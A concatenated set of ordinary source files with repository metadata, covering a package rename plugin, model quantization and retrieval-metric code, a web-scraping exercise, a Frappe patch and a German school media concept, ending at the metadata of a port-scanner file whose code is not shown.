gifted-nguvu/darkstar-dts-converter
|
aa17a751a9f3361ca9bbb400ee4c9516908d1297
|
[
"MIT"
] | 5 |
2019-07-07T16:47:47.000Z
|
2020-08-10T16:20:00.000Z
|
tools/legacy/pac-man/plugins/postinstall/rename.py
|
gifted-nguvu/darkstar-dts-converter
|
aa17a751a9f3361ca9bbb400ee4c9516908d1297
|
[
"MIT"
] | 1 |
2022-02-16T14:59:12.000Z
|
2022-02-16T14:59:12.000Z
|
import os
import json
def canExecute(postInstallValue):
if postInstallValue == "postinstall.rename.json":
return True
return False
def execute(postInstallScriptPath, destDir):
with open(postInstallScriptPath, "r") as scriptFile:
config = json.loads(scriptFile.read())
for originalName, newName in config.items():
if os.path.exists(os.path.join(destDir, originalName)):
print(f"renaming {originalName} to {newName}")
os.replace(os.path.join(destDir, originalName), os.path.join(destDir, newName))
else:
print("cannot find " + originalName)
| 31.047619 | 95 | 0.647239 |
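A self-contained sketch of driving the rename plugin above: it creates a throwaway directory holding one file plus a postinstall.rename.json mapping, then calls canExecute and execute; every file name here is made up for illustration.
import json
import os
import tempfile
destDir = tempfile.mkdtemp()
open(os.path.join(destDir, "old_name.txt"), "w").close()
script = os.path.join(destDir, "postinstall.rename.json")
with open(script, "w") as configFile:
    json.dump({"old_name.txt": "new_name.txt"}, configFile)
if canExecute(os.path.basename(script)):
    execute(script, destDir)
print(sorted(os.listdir(destDir)))     # expect new_name.txt next to the json script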
ca00080a41a5070ee582e1ebaa9aa121277f0813
| 4,532 |
py
|
Python
|
official/cv/yolov3_resnet18/ascend310_quant_infer/post_quant.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/yolov3_resnet18/ascend310_quant_infer/post_quant.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/yolov3_resnet18/ascend310_quant_infer/post_quant.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""do post training quantization for Ascend310"""
import os
import sys
import numpy as np
from amct_mindspore.quantize_tool import create_quant_config
from amct_mindspore.quantize_tool import quantize_model
from amct_mindspore.quantize_tool import save_model
import mindspore as ms
import mindspore.ops as ops
from mindspore import context, Tensor
from mindspore.train.serialization import load_checkpoint, load_param_into_net
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend")
def quant_yolov3_resnet(network, dataset, input_data):
"""
Export post training quantization model of AIR format.
Args:
network: the origin network for inference.
dataset: the data for inference.
input_data: the data used for constructing network. The shape and format of input data should be the same as
actual data for inference.
"""
# step2: create the quant config json file
create_quant_config("./config.json", network, *input_data)
# step3: do some network modification and return the modified network
calibration_network = quantize_model("./config.json", network, *input_data)
calibration_network.set_train(False)
# step4: perform the evaluation of network to do activation calibration
concat = ops.Concat()
index = 0
image_data = []
for data in dataset.create_dict_iterator(num_epochs=1):
index += 1
if index == 1:
image_data = data["image"]
else:
image_data = concat((image_data, data["image"]))
if index == dataset.get_dataset_size():
_ = calibration_network(image_data, data["image_shape"])
# step5: export the air file
save_model("results/yolov3_resnet_quant", calibration_network, *input_data)
print("[INFO] the quantized AIR file has been stored at: \n {}".format("results/yolov3_resnet_quant.air"))
def export_yolov3_resnet():
""" prepare for quantization of yolov3_resnet """
cfg = ConfigYOLOV3ResNet18()
net = yolov3_resnet18(cfg)
eval_net = YoloWithEval(net, cfg)
param_dict = load_checkpoint(default_config.ckpt_file)
load_param_into_net(eval_net, param_dict)
eval_net.set_train(False)
default_config.export_batch_size = 1
shape = [default_config.export_batch_size, 3] + cfg.img_shape
input_data = Tensor(np.zeros(shape), ms.float32)
input_shape = Tensor(np.zeros([1, 2]), ms.float32)
inputs = (input_data, input_shape)
if not os.path.isdir(default_config.eval_mindrecord_dir):
os.makedirs(default_config.eval_mindrecord_dir)
yolo_prefix = "yolo.mindrecord"
mindrecord_file = os.path.join(default_config.eval_mindrecord_dir, yolo_prefix + "0")
if not os.path.exists(mindrecord_file):
if os.path.isdir(default_config.image_dir) and os.path.exists(default_config.anno_path):
print("Create Mindrecord")
data_to_mindrecord_byte_image(default_config.image_dir,
default_config.anno_path,
default_config.eval_mindrecord_dir,
prefix=yolo_prefix,
file_num=8)
print("Create Mindrecord Done, at {}".format(default_config.eval_mindrecord_dir))
else:
print("image_dir or anno_path not exits")
datasets = create_yolo_dataset(mindrecord_file, is_training=False)
ds = datasets.take(16)
quant_yolov3_resnet(eval_net, ds, inputs)
if __name__ == "__main__":
sys.path.append("..")
from src.yolov3 import yolov3_resnet18, YoloWithEval
from src.config import ConfigYOLOV3ResNet18
from src.dataset import create_yolo_dataset, data_to_mindrecord_byte_image
from model_utils.config import config as default_config
export_yolov3_resnet()
| 40.464286 | 116 | 0.69594 |
b69cdb79a058f81d31bcaf29627ccc737fe4a071
| 350 |
py
|
Python
|
Prediction/collision.py
|
Nivram710/Seretra
|
dc7a509ff37e07ea4688a87ab89d13783299c069
|
[
"Apache-2.0"
] | 2 |
2018-04-12T14:24:33.000Z
|
2020-09-16T07:03:28.000Z
|
Prediction/collision.py
|
Nivram710/Seretra
|
dc7a509ff37e07ea4688a87ab89d13783299c069
|
[
"Apache-2.0"
] | null | null | null |
Prediction/collision.py
|
Nivram710/Seretra
|
dc7a509ff37e07ea4688a87ab89d13783299c069
|
[
"Apache-2.0"
] | null | null | null |
from vec2 import Vec2
import time
# Needs constant time step
def find_collision(o1, o2, threshold):
current_time = int(round(time.time() * 1000))
for pos1, pos2 in zip(o1, o2):
if pos1[1] < current_time and pos2[1] < current_time:
continue
if Vec2.distance(pos1[0], pos2[0]) < threshold:
return pos1
| 26.923077 | 61 | 0.631429 |
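A minimal sketch of calling find_collision above, assuming the local Vec2 type can be constructed as Vec2(x, y); o1 and o2 are lists of (position, timestamp_ms) pairs sampled at the same constant time step, as the comment in the module requires.
import time
from vec2 import Vec2
now_ms = int(round(time.time() * 1000))
o1 = [(Vec2(0.0, 0.0), now_ms + 1000), (Vec2(1.0, 0.0), now_ms + 2000)]
o2 = [(Vec2(5.0, 0.0), now_ms + 1000), (Vec2(1.5, 0.0), now_ms + 2000)]
hit = find_collision(o1, o2, threshold=1.0)
print(hit)   # first future (position, time) pair closer than the threshold, or None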
b6a58014cb2c1dd285a64c4c67e47d0323b569b8
| 250 |
py
|
Python
|
python/coursera_python/MICHIGAN/WEB/week4/shr.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python/coursera_python/MICHIGAN/WEB/week4/shr.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python/coursera_python/MICHIGAN/WEB/week4/shr.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
import urllib2
from bs4 import BeautifulSoup
page = urllib2.urlopen(raw_input("Enter URL: "))
soup = BeautifulSoup(page, "html.parser")
spans = soup('span')
numbers = []
for span in spans:
numbers.append(int(span.string))
print sum(numbers)
| 16.666667 | 48 | 0.72 |
fceb2a52211da9a8c0aa8ef0042f78ffe7faaac0
| 8,590 |
py
|
Python
|
book/_build/jupyter_execute/docs/001_zielsetzung.py
|
tom-tubeless/wwg-digitales-miteinander
|
d9391046a7ed12b91b538b937993161c67d77d68
|
[
"CC0-1.0"
] | null | null | null |
book/_build/jupyter_execute/docs/001_zielsetzung.py
|
tom-tubeless/wwg-digitales-miteinander
|
d9391046a7ed12b91b538b937993161c67d77d68
|
[
"CC0-1.0"
] | null | null | null |
book/_build/jupyter_execute/docs/001_zielsetzung.py
|
tom-tubeless/wwg-digitales-miteinander
|
d9391046a7ed12b91b538b937993161c67d77d68
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# # Zielsetzung
#
# ## Medien im Wandel
#
# Die Digitalisierung unseres Alltags hat weitreichende Folgen für das Leben und Lernen unserer Schüler:Innen.
# Kontinuierliche Änderungen in der digitalen Medienlandschaft versteht das Wim-Wenders-Gymnasium als Chance, sogenannte neue Medien sinnvoll in den Lernprozess der Schüler:Innen zu integrieren.
# Medien wie Smartphones, elektrische Wiedergabegeräte und Computer werden von einem Großteil der Schüler:Innen täglich vielseitig genutzt.
# Eine zentrale Aufgabe der Schule sollte es sein, diese Medienaffinität der Jugendlichen sinnvoll zu kanalisieren, produktiv zu nutzen und unterstützend zu begleiten.
# Wir wollen unseren Schüler:Innenn eine medienbezogene Reflexions- und Handlungskompetenz vermitteln.
# Sie sollen lernen, die Mediensysteme sicher zu nutzen, kritisch zu bewerten und effektiv als Ressource für ihre individuellen Bildungsbiografien und ihre Identitätsarbeit auszuschöpfen.
# Dazu gehört explizit die Erziehung zu einem digital mündigen Teil der Gesellschaft, der die Regeln im gesellschaftlichen Miteinander nicht nur kennt, sondern auch lebt und schützt.
#
# Die zu vermittelnden Inhalte sind eng mit dem [Medienkompetenzrahmen](https://www.schulministerium.nrw.de/docs/bp/Ministerium/Schulverwaltung/Schulmail/Archiv-2018/180626/Kontext/2018_Medienkompetenzrahmen_NRW.pdf) {cite:ps}`MKR2018` der NRW-Landesregierung verknüpft und als progressive Kompetenz-Ziele ausformuliert über die Schulinternen Lehrpläne der Fächer verteilt.
# Eine besondere Rolle spielt am Wim-Wenders-Gymnasium die Verbindung der Naturwissenschaften mit den Künsten -- Die kreative Nutzung technische und digitaler Medien hat in unserer Schule somit einen großen Stellenwert.
# Beispiele finden sich in den Milestones im Anhang \ref{sec:milestones}
# Ziel ist es, das digitale Miteinander über die Schulgrenzen hinaus aktiv zu Gestalten und dem Ruf gerecht zu werden, eine Schule des 21. Jahrhunderts zu sein.
#
# ## Zeitgemäße Lernkultur
#
# In den letzten Jahren hat sich die Struktur des Lernprozesses der Schüler:Innen verändert.
# Digitale Medien spielen eine wachsende Rolle beim Lehren und Lernen in einer digitalisierten Welt.
# Schüler:Innen recherchieren Fachinhalte im Internet, erstellen Dokumente mit Textverarbeitungsprogrammen und erschließen sich Themen anhand von Computersimulationen.
# Diese Medien stehen neben den „klassischen“ Büchern, Tonträgern und weiteren Beispielen, ersetzten diese aber im Alltag in vielen Bereichen.
# Dieser Veränderung in der Lernkultur soll die Schule Rechnung tragen, indem sie einerseits Möglichkeiten bietet, die Vorteile digitalen Lehrens und Lernens zu nutzen und andererseits Schüler:Innen beim Erlernen dieser Fähigkeiten unterstützt.
# Hier geht es nicht nur um den Umgang mit den einschlägigen Programmen, sondern auch darum, Gefahren im Umgang mit dem Internet und sozialen Netzwerken aufzuzeigen und Schüler:Innenn dazu befähigen diesen begegnen zu können.
# Statt einer Substitution von Medien ist eine Transformation von Kompetenzen mit Hilfe verschiedener Medien gewünscht.
# Es ist Ziel des Wim-Wenders-Gymnasiums, Schüler:Innen medienbezogene Reflexions- und Handlungskompetenz zu vermitteln und sie damit zum kompetenten Umgang mit Medien zu befähigen.
#
# Die Schüler:Innen sollen die Schule als medienkompetente Abiturientinnen und Abiturienten verlassen.
# Die Kernfrage für unsere Arbeit am Konzept für das digitale Miteinander lautet daher: „Welche Kompetenzen sollten medienkompetente Abiturient\*Innen beherrschen, wenn sie von der Schule in den Berufs- bzw. Universitätsalltag entlassen werden?“
# Neben der effizienten Benutzung von „Office-Programmen“, geht es um den vorsichtigen Umgang mit persönlichen Daten (beispielsweise in sozialen Netzen), sowie um die kompetente Nutzung digitaler Medien als Recherche- und Lernressource bis hin zu einer kritischen Reflexion der Medien in ihren politischen, sozialen und wirtschaftlichen Funktionen.
# Typische Unterrichtsfragen sind: Wie recherchiere ich mithilfe digitaler Medien und nutze Suchmaschinen möglichst effizient?
# Welche Medien sind für welches Anliegen geeignet: Wikipedia für die Facharbeit, oder doch lieber ein Buch?
# In Bezug auf das Arbeiten mit den Office-Programmen darf der Fokus nicht nur auf den handwerklichen Fähigkeiten wie der Bedienung der Programme liegen, sondern die Schüler:Innen sollen auch die grundlegenden Techniken wissenschaftlichen Arbeitens lernen (kritische Quellenarbeit, formale Ausgestaltung von Dokumenten, angemessene Präsentationen etc.).
# Ziel ist es ein lebenslanges digital unterfüttertes Lernen zu Fördern.
#
# Mit der Verankerung digitaler Medien im Unterricht handelt das Wim-Wenders-Gymnasium auch im Sinne der Nachhaltigkeit.
# Individuelle Förderung, Übungen, die nach Bedarf bearbeitet werden und wichtige Informationen können effizient geteilt, kooperativ bearbeitet und für alle papierlos zugänglich gemacht werden.
#
# Dem Wim-Wenders-Gymnasium ist es wichtig einen maßvollen Umgang mit Medien zu lehren.
# Studien legen nahe, dass einige digitale Medien ein gewisses Suchtpotential haben {cite:ps}`Rehbein2012` und somit einen Lernprozess negativ beeinflussen können.
# Durch einen geplanten und gezielten Einsatz von „neuen“ Medien gepaart mit dem Einsatz „klassischer“ Medien will das Wim-Wenders-Gymnasium dem entgegen wirken.
# So ist zum Beispiel auf dem Gelände des Wim-Wenders-Gymnasium die Nutzung privater digitaler Endgeräte zu privaten Zwecken verboten.
# Dies soll nicht nur für eine kommunikative salutogene Atmosphäre sorgen, sondern auch einen positiven Einfluss auf die Leistungen der Schüler:Innen haben. {cite:ps}`Beland2016`
# Auch der Anonymisierung innerhalb der Schulgemeinde soll so vorgebeugt werden, gilt sie doch als Nährboden für den Missbrauch digitaler Medien wie zum Beispiel Cybermobbing.
#
# Die Maßnahmen der Schule (vgl. S. \pageref{sec:praevention}) haben folgende Intentionen:
#
# ### Förderung der Empathie
#
# Eine empathische Haltung den Mitmenschen gegenüber, erzielt laut den aktuellen Forschungsergebnissen die stärkste Wirkung bei der Prävention und der Unterbindung von Gewalt sowohl in der virtuellen, als auch in der realen Welt.
#
# ### Förderung der Medienwirkungskompetenz
#
# Die Schüler:Innen des Wim-Wenders-Gymnasiums erwerben ein ausgeprägtes Medienwissen und Fähigkeit zur analytischen, reflektierten und sozialbestimmenden Medienkritik.
#
# ### Aufzeigen prosozialer Handlungspositionen
#
# Mobbing wird unter anderem als Demonstration der Macht ausgeführt. Dieses Verhalten ist adoptiert. Förderung des prosozialen Handelns auf der Klassenebene kann indirekt das Verhalten von Kindern beeinflussen.
#
# ### Förderung des Selbstvertrauens in die eignen Überzeugungen
#
# Einstellungen und Verhalten der Freunde spielt bei der Motivation zur Ausübung von Cybermobbing eine wichtige Rolle.
# Täter mit einem hohen öffentlichen Score können das Verhalten der Gruppe beeinflussen.
# Schüler:Innen, die keine positive Einstellung dem Cybermobbing gegenüber haben, sollten eine Abneigung gegenüber dem Täterverhalten entwickeln.
#
# ### Präventive und Intervenierende Maßnahmen (bei Risikogruppen)
#
# Änderung der Einstellungen und Unterbindung des Zusammenhangs der wahrgenommenen Verhaltenskontrolle und des Cybermobbings.
#
# Das Wim-Wenders-Gymnasium möchte eine Schule sein, die die Schüler:Innen entlang ihrer lebenslangen Lernbiografie fördert, fordert und im positiven Sinne prägt.
# Die Werte und Normen einer salutogenen Schule müssen also auf die digitalen Kompetenzen übertragen werden.
# Grundlage dafür kann eine transparente Kommunikation und demokratische Entscheidungsprozesse sein.
# Die Schule will zur ständigen Evaluation und Optimierung digitale Werkzeuge testen und verwenden.
#
# ## Bezug zu Kernlehrplänen
#
# Die [Kernlehrpläne des Landes Nordrhein-Westfalen](https://www.schulentwicklung.nrw.de/lehrplaene/lehrplannavigator-s-i/) fordern seit 2014 explizit den Einsatz neuer Medien im Unterricht.
# So sieht zum Beispiel der Lehrplan im Fach Kunst den Einsatz von Software zum Ton- und Videoschnitt und von Bildbearbeitungsprogrammen vor.
# Mit Bezug zum besonderen Schwerpunkt des Wim-Wenders-Gymnasiums (Die Verbindung von Kunst und Naturwissenschaften) sind alle Fächer aufgerufen, nach sinnvollen Möglichkeiten im Umgang mit den Medien zu suchen.
# Das Konzept für das digitale Miteinander stellt dafür gemeinsam mit der Lehrplan-Partitur die Grundlage dar.
#
# <!-- ```{bibliography}
# :style: plain
# ``` -->
| 96.516854 | 373 | 0.824563 |
a2165aa6951d3a430dc2edfe07654812be40c3b8
| 12,033 |
py
|
Python
|
solutions/pedestrian_search/webserver/src/utils/metric.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | 1 |
2021-01-11T18:40:22.000Z
|
2021-01-11T18:40:22.000Z
|
solutions/pedestrian_search/webserver/src/utils/metric.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | null | null | null |
solutions/pedestrian_search/webserver/src/utils/metric.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
import numpy as np
import logging
from torch.nn.parameter import Parameter
from torch.autograd import Variable
from milvus import Milvus, IndexType, MetricType, Status
client = Milvus(host='192.168.1.85', port='19666')
logger = logging.getLogger()
logger.setLevel(logging.INFO)
class EMA():
def __init__(self, decay=0.999):
self.decay = decay
self.shadow = {}
def register(self, name, val):
self.shadow[name] = val.cpu().detach()
def get(self, name):
return self.shadow[name]
def update(self, name, x):
assert name in self.shadow
new_average = (1.0 - self.decay) * x.cpu().detach() + self.decay * self.shadow[name]
self.shadow[name] = new_average.clone()
def create_collection(gallery):
param = {'collection_name':'test01', 'dimension':512, 'index_file_size':1024, 'metric_type':MetricType.IP}
status = client.create_collection(param)
ivf_param = {'nlist': 2048}
status = client.create_index('test01', IndexType.IVF_FLAT, ivf_param)
status, inserted_vector_ids = client.insert(collection_name='test01', records=gallery)
#print(len(inserted_vector_ids))
def pairwise_distance(A, B):
"""
Compute distance between points in A and points in B
:param A: (m,n) -m points, each of n dimension. Every row vector is a point, denoted as A(i).
:param B: (k,n) -k points, each of n dimension. Every row vector is a point, denoted as B(j).
:return: Matrix with (m, k). And the ele in (i,j) is the distance between A(i) and B(j)
"""
A_square = torch.sum(A * A, dim=1, keepdim=True)
B_square = torch.sum(B * B, dim=1, keepdim=True)
distance = A_square + B_square.t() - 2 * torch.matmul(A, B.t())
return distance
def one_hot_coding(index, k):
if type(index) is torch.Tensor:
length = len(index)
else:
length = 1
out = torch.zeros((length, k), dtype=torch.int64).cuda()
index = index.reshape((len(index), 1))
out.scatter_(1, index, 1)
return out
# deprecated due to the large memory usage
def constraints_old(features, labels):
distance = pairwise_distance(features, features)
labels_reshape = torch.reshape(labels, (features.shape[0], 1))
labels_dist = labels_reshape - labels_reshape.t()
labels_mask = (labels_dist == 0).float()
# Average loss with each matching pair
num = torch.sum(labels_mask) - features.shape[0]
if num == 0:
con_loss = 0.0
else:
con_loss = torch.sum(distance * labels_mask) / num
return con_loss
def constraints(features, labels):
labels = torch.reshape(labels, (labels.shape[0],1))
con_loss = AverageMeter()
index_dict = {k.item() for k in labels}
for index in index_dict:
labels_mask = (labels == index)
feas = torch.masked_select(features, labels_mask)
feas = feas.view(-1, features.shape[1])
distance = pairwise_distance(feas, feas)
#torch.sqrt_(distance)
num = feas.shape[0] * (feas.shape[0] - 1)
loss = torch.sum(distance) / num
con_loss.update(loss, n = num / 2)
return con_loss.avg
def constraints_loss(data_loader, network, args):
network.eval()
max_size = args.batch_size * len(data_loader)
images_bank = torch.zeros((max_size, args.feature_size)).cuda()
text_bank = torch.zeros((max_size,args.feature_size)).cuda()
labels_bank = torch.zeros(max_size).cuda()
index = 0
con_images = 0.0
con_text = 0.0
with torch.no_grad():
for images, captions, labels, captions_length in data_loader:
images = images.cuda()
captions = captions.cuda()
interval = images.shape[0]
image_embeddings, text_embeddings = network(images, captions, captions_length)
images_bank[index: index + interval] = image_embeddings
text_bank[index: index + interval] = text_embeddings
labels_bank[index: index + interval] = labels
index = index + interval
images_bank = images_bank[:index]
text_bank = text_bank[:index]
labels_bank = labels_bank[:index]
if args.constraints_text:
con_text = constraints(text_bank, labels_bank)
if args.constraints_images:
con_images = constraints(images_bank, labels_bank)
return con_images, con_text
class Loss(nn.Module):
def __init__(self, args):
super(Loss, self).__init__()
self.CMPM = args.CMPM
self.CMPC = args.CMPC
self.epsilon = args.epsilon
self.num_classes = args.num_classes
if args.resume:
checkpoint = torch.load(args.model_path)
self.W = Parameter(checkpoint['W'])
print('=========> Loading in parameter W from pretrained models')
else:
self.W = Parameter(torch.randn(args.feature_size, args.num_classes))
self.init_weight()
def init_weight(self):
nn.init.xavier_uniform_(self.W.data, gain=1)
def compute_cmpc_loss(self, image_embeddings, text_embeddings, labels):
"""
Cross-Modal Projection Classfication loss(CMPC)
:param image_embeddings: Tensor with dtype torch.float32
:param text_embeddings: Tensor with dtype torch.float32
:param labels: Tensor with dtype torch.int32
:return:
"""
criterion = nn.CrossEntropyLoss(reduction='mean')
self.W_norm = self.W / self.W.norm(dim=0)
#labels_onehot = one_hot_coding(labels, self.num_classes).float()
image_norm = image_embeddings / image_embeddings.norm(dim=1, keepdim=True)
text_norm = text_embeddings / text_embeddings.norm(dim=1, keepdim=True)
image_proj_text = torch.sum(image_embeddings * text_norm, dim=1, keepdim=True) * text_norm
text_proj_image = torch.sum(text_embeddings * image_norm, dim=1, keepdim=True) * image_norm
image_logits = torch.matmul(image_proj_text, self.W_norm)
text_logits = torch.matmul(text_proj_image, self.W_norm)
#labels_one_hot = one_hot_coding(labels, num_classes)
'''
ipt_loss = criterion(input=image_logits, target=labels)
tpi_loss = criterion(input=text_logits, target=labels)
cmpc_loss = ipt_loss + tpi_loss
'''
cmpc_loss = criterion(image_logits, labels) + criterion(text_logits, labels)
#cmpc_loss = - (F.log_softmax(image_logits, dim=1) + F.log_softmax(text_logits, dim=1)) * labels_onehot
#cmpc_loss = torch.mean(torch.sum(cmpc_loss, dim=1))
# classification accuracy for observation
image_pred = torch.argmax(image_logits, dim=1)
text_pred = torch.argmax(text_logits, dim=1)
image_precision = torch.mean((image_pred == labels).float())
text_precision = torch.mean((text_pred == labels).float())
return cmpc_loss, image_precision, text_precision
def compute_cmpm_loss(self, image_embeddings, text_embeddings, labels):
"""
Cross-Modal Projection Matching Loss(CMPM)
:param image_embeddings: Tensor with dtype torch.float32
:param text_embeddings: Tensor with dtype torch.float32
:param labels: Tensor with dtype torch.int32
:return:
i2t_loss: cmpm loss for image projected to text
t2i_loss: cmpm loss for text projected to image
pos_avg_sim: average cosine-similarity for positive pairs
neg_avg_sim: average cosine-similarity for negative pairs
"""
batch_size = image_embeddings.shape[0]
labels_reshape = torch.reshape(labels, (batch_size, 1))
labels_dist = labels_reshape - labels_reshape.t()
labels_mask = (labels_dist == 0)
image_norm = image_embeddings / image_embeddings.norm(dim=1, keepdim=True)
text_norm = text_embeddings / text_embeddings.norm(dim=1, keepdim=True)
image_proj_text = torch.matmul(image_embeddings, text_norm.t())
text_proj_image = torch.matmul(text_embeddings, image_norm.t())
# normalize the true matching distribution
labels_mask_norm = labels_mask.float() / labels_mask.float().norm(dim=1)
i2t_pred = F.softmax(image_proj_text, dim=1)
#i2t_loss = i2t_pred * torch.log((i2t_pred + self.epsilon)/ (labels_mask_norm + self.epsilon))
i2t_loss = i2t_pred * (F.log_softmax(image_proj_text, dim=1) - torch.log(labels_mask_norm + self.epsilon))
t2i_pred = F.softmax(text_proj_image, dim=1)
#t2i_loss = t2i_pred * torch.log((t2i_pred + self.epsilon)/ (labels_mask_norm + self.epsilon))
t2i_loss = t2i_pred * (F.log_softmax(text_proj_image, dim=1) - torch.log(labels_mask_norm + self.epsilon))
cmpm_loss = torch.mean(torch.sum(i2t_loss, dim=1)) + torch.mean(torch.sum(t2i_loss, dim=1))
sim_cos = torch.matmul(image_norm, text_norm.t())
pos_avg_sim = torch.mean(torch.masked_select(sim_cos, labels_mask))
neg_avg_sim = torch.mean(torch.masked_select(sim_cos, labels_mask == 0))
return cmpm_loss, pos_avg_sim, neg_avg_sim
def forward(self, image_embeddings, text_embeddings, labels):
cmpm_loss = 0.0
cmpc_loss = 0.0
image_precision = 0.0
text_precision = 0.0
neg_avg_sim = 0.0
pos_avg_sim =0.0
if self.CMPM:
cmpm_loss, pos_avg_sim, neg_avg_sim = self.compute_cmpm_loss(image_embeddings, text_embeddings, labels)
if self.CMPC:
cmpc_loss, image_precision, text_precision = self.compute_cmpc_loss(image_embeddings, text_embeddings, labels)
loss = cmpm_loss + cmpc_loss
return cmpm_loss, cmpc_loss, loss, image_precision, text_precision, pos_avg_sim, neg_avg_sim
class AverageMeter(object):
"""
Computes and stores the average and current value
Imported from https://github.com/pytorch/examples/blob/master/imagenet/main.py #L247-262
"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += n * val
self.count += n
self.avg = self.sum / self.count
def compute_topk(query, gallery, target_query, target_gallery, k=[1,10], reverse=False):
result = []
query = query / query.norm(dim=1,keepdim=True)
gallery = gallery / gallery.norm(dim=1,keepdim=True)
#print("query:", query, "size:", query.size())
#print("gallery:", gallery, "size:", gallery.size())
sim_cosine = torch.matmul(query, gallery.t())
#create_collection(gallery.tolist())
search_param = {'nprobe': 16}
status, results = client.search(collection_name='test01', query_records=query.tolist()[:2], top_k=5, params=search_param)
result.extend(topk(sim_cosine, target_gallery, target_query, k=[1,10]))
if reverse:
result.extend(topk(sim_cosine, target_query, target_gallery, k=[1,10], dim=0))
return result
def topk(sim, target_gallery, target_query, k=[1,10], dim=1):
result = []
maxk = max(k)
size_total = len(target_gallery)
_, pred_index = sim.topk(maxk, dim, True, True)
pred_labels = target_gallery[pred_index]
print('pred_labels:', pred_labels)
if dim == 1:
pred_labels = pred_labels.t()
print('pred_labels:', pred_labels)
correct = pred_labels.eq(target_query.view(1,-1).expand_as(pred_labels))
print('correct:', correct)
for topk in k:
#correct_k = torch.sum(correct[:topk]).float()
correct_k = torch.sum(correct[:topk], dim=0)
correct_k = torch.sum(correct_k > 0).float()
result.append(correct_k * 100 / size_total)
return result
| 39.19544 | 200 | 0.648799 |
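A small self-check for the pairwise_distance helper above: for unit-normalised rows the squared Euclidean distance must equal 2 - 2 * cosine similarity, so the two computations should agree.
import torch
A = torch.nn.functional.normalize(torch.randn(4, 8), dim=1)
B = torch.nn.functional.normalize(torch.randn(6, 8), dim=1)
dist = pairwise_distance(A, B)              # (4, 6) squared distances
cos = torch.matmul(A, B.t())                # (4, 6) cosine similarities
print(torch.allclose(dist, 2 - 2 * cos, atol=1e-5))   # expected: True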
bfba49096c7692d2b35980349ffd844d144b37b8
| 260 |
py
|
Python
|
02_Python/exceptions.py
|
DaviNakamuraCardoso/Harvard-CS50-Web-Programming
|
afec745eede41f7b294c3ee6ebaff9ac042e5e4c
|
[
"MIT"
] | null | null | null |
02_Python/exceptions.py
|
DaviNakamuraCardoso/Harvard-CS50-Web-Programming
|
afec745eede41f7b294c3ee6ebaff9ac042e5e4c
|
[
"MIT"
] | null | null | null |
02_Python/exceptions.py
|
DaviNakamuraCardoso/Harvard-CS50-Web-Programming
|
afec745eede41f7b294c3ee6ebaff9ac042e5e4c
|
[
"MIT"
] | null | null | null |
import sys
try:
x = int(input("X:"))
y = int(input("Y:"))
except ValueError:
print("Error: invalid input.")
sys.exit(1)
try:
result = x / y
except ZeroDivisionError:
print("Error: Could not divide by 0.")
sys.exit(1)
print(result)
| 17.333333 | 42 | 0.607692 |
78322d4575ef60a29998c49fc307987e022760d3
| 492 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/patches/v8_0/move_perpetual_inventory_setting.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
frappe-bench/apps/erpnext/erpnext/patches/v8_0/move_perpetual_inventory_setting.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/patches/v8_0/move_perpetual_inventory_setting.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
def execute():
frappe.reload_doctype('Company')
enabled = frappe.db.get_single_value("Accounts Settings", "auto_accounting_for_stock") or 0
for data in frappe.get_all('Company', fields = ["name"]):
doc = frappe.get_doc('Company', data.name)
doc.enable_perpetual_inventory = enabled
doc.db_update()
| 37.846154 | 92 | 0.768293 |
784d84323ab8c5da74c358fca266206b63129f3a
| 1,875 |
py
|
Python
|
code/python/portscanner.py
|
Grasshoppeh/road2oscp
|
